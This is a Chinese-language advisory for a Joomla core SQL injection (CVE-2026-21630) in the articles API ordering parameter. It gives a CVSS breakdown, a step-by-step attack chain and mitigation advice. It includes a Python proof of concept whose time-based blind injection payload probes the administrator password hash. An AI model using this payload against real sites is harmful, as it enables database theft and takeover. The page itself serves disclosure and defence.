CVE-2026-21630 CVSS 8.8 高危

CVE-2026-21630 Joomla核心SQL注入漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-21630

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Joomla Core

漏洞概述

Joomla核心组件中的articles webservice endpoint存在SQL注入漏洞。由于构建order子句时处理不当，导致低权限攻击者无需用户交互即可通过网络发起攻击。该漏洞严重影响系统的机密性、完整性和可用性，攻击者可利用此漏洞窃取数据库敏感信息或篡改数据。

技术细节

该漏洞根因在于Joomla后端处理API请求时，未对排序参数进行充分的校验和过滤。在com_content组件提供的文章服务接口中，程序直接将用户输入拼接到SQL查询的ORDER BY子句中。由于CVSS指标显示攻击需要低权限（PR:L），攻击者首先需要注册一个普通账户获取合法会话或API Token。随后，通过构造恶意的HTTP请求，在排序字段中注入SQL语法（如CASE WHEN语句进行盲注）。利用此漏洞，攻击者可以绕过前端限制，执行任意SQL查询以提取管理员密码哈希、用户令牌等敏感数据，或者在特定条件下修改数据库内容，完全控制受影响的CMS系统。

攻击链分析

STEP 1

侦察

攻击者识别目标网站运行的是Joomla CMS，并确定开启了Articles Webservice API接口。

STEP 2

获取凭证

由于漏洞需要低权限（PR:L），攻击者在目标网站注册一个普通用户账户，获取API访问令牌。

STEP 3

漏洞利用

攻击者构造包含恶意SQL注入语句的HTTP POST请求发送至/articles接口，操纵order子句。

STEP 4

数据窃取

通过布尔盲注或时间盲注技术，攻击者逐位提取数据库中的敏感信息，如管理员哈希或会话密钥。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Joomla Core 2026-21630 SQL Injection PoC
# Date: 2026-04-01
# Vulnerable Endpoint: /api/index.php/v1/articles

target_url = "http://target-site.com/api/index.php/v1/articles"
# Attacker needs a valid low-privilege token (PR:L)
auth_token = "Bearer LOW_PRIVILEGE_TOKEN_HERE" 

headers = {
    "Authorization": auth_token,
    "Content-Type": "application/json"
}

# Malicious payload for order clause
# Using conditional sleep to verify injection
payload = {
    "filter": {
        "search": ""
    },
    "list": {
        # The injection happens in the ordering parameter
        "ordering": "(SELECT CASE WHEN (SELECT SUBSTRING((SELECT password FROM #__users WHERE id=1),1,1))='a' THEN SLEEP(5) ELSE 1 END)"
    }
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.elapsed.total_seconds() >= 5:
        print("[+] SQL Injection successful! Response delayed.")
    else:
        print("[-] Injection failed or condition not met.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Joomla Core 4.x

Joomla Core 5.x

防御指南

临时缓解措施

建议立即检查Joomla版本并应用官方补丁。在无法立即升级的情况下，建议临时禁用Articles Webservice Endpoint的功能，或在反向代理层面严格过滤包含特殊字符的排序参数。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表